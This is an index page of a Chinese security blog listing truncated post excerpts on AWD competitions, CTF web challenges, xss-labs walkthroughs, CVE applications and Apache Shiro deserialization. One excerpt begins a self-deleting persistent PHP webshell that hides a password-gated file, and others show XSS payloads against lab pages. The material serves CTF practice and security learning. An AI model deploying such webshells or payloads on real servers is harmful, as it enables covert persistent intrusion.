春告鳥

摘要： 一个简单的不死马如： <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325 阅读全文

摘要： AWD比赛防止没有网络，在移动硬盘里面准备一个乌云漏洞库。 之前也想过弄一个乌云的镜像网站，无奈学生机性能太低下了，部署到公网上服务器存储空间都不够，只能部署在本地硬盘了。 乌云镜像的开源地址：https://github.com/m0l1ce/wooyunallbugs 文件的百度网盘下载链接：h 阅读全文

摘要： 这段时间都没更博客，扫描器的更新也暂时停止了，因为回了学校之后需要准备实验室招新和几个比赛的事情，内疚两秒钟，赶快学习！ burp里面的插件很多，但是不要被纷繁复杂的功能迷了双眼，还是那句话：适合自己的才是最好的。只有需要用到的时候根据需求寻找插件再去下载安装，才能起到最大的作用，如果仅仅是为了充实 阅读全文

摘要： CTF SHOW平台的WEB AK赛： 签到_观己 <?php ​ if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ die('error'); }else{ include($file 阅读全文

摘要： CVE的全称是"Common Vulnerabilities and Exposures"翻译成中文就是"公共漏洞和披露" 可以简单理解跟国内CNVD的通用漏洞证书差不多，不过CVE是分配给你一个全球唯一的CVE_ID 网上申请CVE的教程都是从github开源CMS上入手，本篇也不能免俗，如果你已 阅读全文

摘要： 16-20关 第十六关 关键代码为： <?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("script"," ",$str); $str3=str_replace(" 阅读全文

摘要： 查看关键代码： <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_REFERER']; $str22=str_replace(">" 阅读全文

摘要： 进入第六关 简单判断过滤情况 <>script"'/ 查看源代码 可以看到第二个红框部分跟之前类似，闭合双引号尝试进行弹窗 "><script>alert(1)</script> 关键字被下划线分割了，尝试使用前一关的payload "><a href="javascript:alert(1)">h 阅读全文

摘要： 以前囫囵吞枣做过一遍，现在从头再来 第一关网址为：http://127.0.0.1/xss-labs-master/level1.php?name=test 而页面上显示了用户test，name可控，查看其源代码为 echo "<h2 align=center>欢迎用户".$str."</h2>"; 阅读全文

摘要： Apache Shiro是一个强大易用的Java安全框架，提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用，同时也能提供健壮的安全性。在Apache Shiro编号为550的 issue 中爆出严重的 Java 反序列化漏洞。 漏洞原理： 以后研究透彻了再写 暂时只写利用:D 影响版 阅读全文